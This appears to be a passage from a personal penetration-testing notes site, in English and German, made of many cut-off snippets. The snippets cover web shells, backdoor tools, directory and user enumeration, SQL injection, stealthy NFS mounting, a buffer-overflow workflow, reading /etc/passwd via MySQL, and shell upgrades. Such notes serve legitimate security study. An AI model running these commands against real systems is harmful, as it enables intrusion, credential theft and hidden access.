Download: https://github.com/droope/droopescan droopescan scan drupal -u http://$target/ -t 32 Or just install via pip pip install droopescan
Weevely https://tools.kali.org/maintaining-access/weevely Erzeugt PHP-Skript auf Server, mit dem man eine Shell wieder bekommen kann. Various scripts Shelter (win32) Dynamic shell injection tool into normal Windows binaries. https://tools.kali.org/maintaining-access/shellter Create own (normal) shell HTTPTunnel Needs PHP; creates file on a server which acts as SSH proxy. Nishang Collection of PowerShell scripts for backdoors and more. Kali:/usr/share/nishang dns2tcp Creates a TCP…
https://tools.kali.org/exploitation-tools/commix Created SQL injections on the fly.
Directory enumeration Hints: General search nikto -host $victim gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
Union-based injections Blind SQL injections If no output is given from a statement, try to use time-based approaches. Enumerating in inserts Assuming the INSERT statement is INSERT INTO $tablename (email,name) VALUES ("email", "name"); Then try a timing attack to determine if a certain value is in a field: INSERT INTO newsletter (name,email) VALUES ('name', ' ' AND…
General objectives Organizing template Web ressources Tools Notes
List with a ton of one-liner web servers in various languages HTTP python -m SimpleHTTPServer 8000 python3 -m http.server 8000 HTTPS ruby -r webrick/https -e ' WEBrick::HTTPServer.new( Port: 8000, DocumentRoot: ".", SSLEnable: true, SSLCertName: [%w[CN localhost]]).start'
(!) See also Password spraying to check a obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If there is a password policy known: Check password policy In Windows, type net accounts to get informations about account locking, lockout threasholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
Displays all available network shares: showmount -e $target Normal mount mount -t nfs $target:/home /mnt Mounting with nfspy — with the hide option, it mounts and unmounts for the server so the victim cannot see the new connection via showmount. nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt Mount via SSH ssh -N -L 3049:localhost:2049 user@hostname mount -t nfs -o port=3049…
tcp/135 udp/135 — and as (Microsoft) Remote Procedure Call on tcp/593 as web service. Enumeration Obtain general information # rpcinfo -p $target # rpcinfo -s $target Connect. Hint: auto completion works; enum<tab> returns all enum commands. rpcclient -U "" $target Enumerate through all API endpoints with one of the following options. python /usr/local/bin/rpcdump.py $target |…
Enumeration Aktuell angemeldete Benutzer anzeigen finger @ip Benutzer-Enumeration for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done Enumeration mit Metasploit: msf5 > use auxiliary/scanner/finger/finger_users msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76 rhosts => 10.10.10.76 msf5 auxiliary(scanner/finger/finger_users) > run Exploits Auf sehr alten Systemen konnte man https://insecure.org/sploits_all.html zufolge Befehle ausführen, etwa mit finger "|/bin/id@host'
Use the bof1_web.py or bof1_socket.py to start. Use bof1_socket_10.py to determine the position of the EIP. Use bof2_socket_20.py with the found EIP offset to verify that the EIP was overwritten with B’s. Use bof3_socket_10.py with the found EIP and find all bad chars. Find with Mona a JMP address. Create payload, add it and €profit. 0. Confirm vulnerability Download…
Note that iptables and ip6tables should be used always together! Tables Iptables manages a set of tables which act as ACL Access Control Lists. Actions Actions are defined via the -j option. Examples Show all rules iptables -Lip6tables -L Ignore all packets from a network: iptables -A INPUT -s 192.168.5.1/32 -j DROPip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…
tcpdump Get incoming ICMP packets: sudo tcpdump -i any icmp and src host $target Nützliche Parameter Domains nicht auflösen, IPs anzeigen -n Dump der Daten anzeigen -X Paket in ASCII anzeigen -A Umgang mit Dateien Dump in Datei schreiben tcpdump -w file Dump aus Datei lesen tcpdump -r file Standard-Abfragen tcpdump -n src|dst 10.10.10.10 and port…
See a packet in its context Kontextmenü, Follow auswählen Show only ICMP packets from a host tcpdump host 10.11.1.128 and icmp -i tun0 Show other systems communicating outside the own address ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr Record audio Wireshark can transform captured audio…
Screen-Sitzung mit Namen starten screen -S name Screen-Sitzungen auflisten screen -ls Screen-Sitzung fortsetzen screen -xS name
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…
Before < 2.2.10 : SQL injection possible (https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html)
Use dash, which doesn’t drop privileges. Arguments ls Order by the last recent modified file: ls -t Better history Add this to .bashrc HISTSIZE=10000 HISTTIMEFORMAT='%F %T ' Handling from files with starting - cp -- -file.txt file.txt STDOUT, STDIN and STDERR (redirection) Output STDERR (2) also on STDOUT (1) cmd 2>&1 man Seaching for a keyword in…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';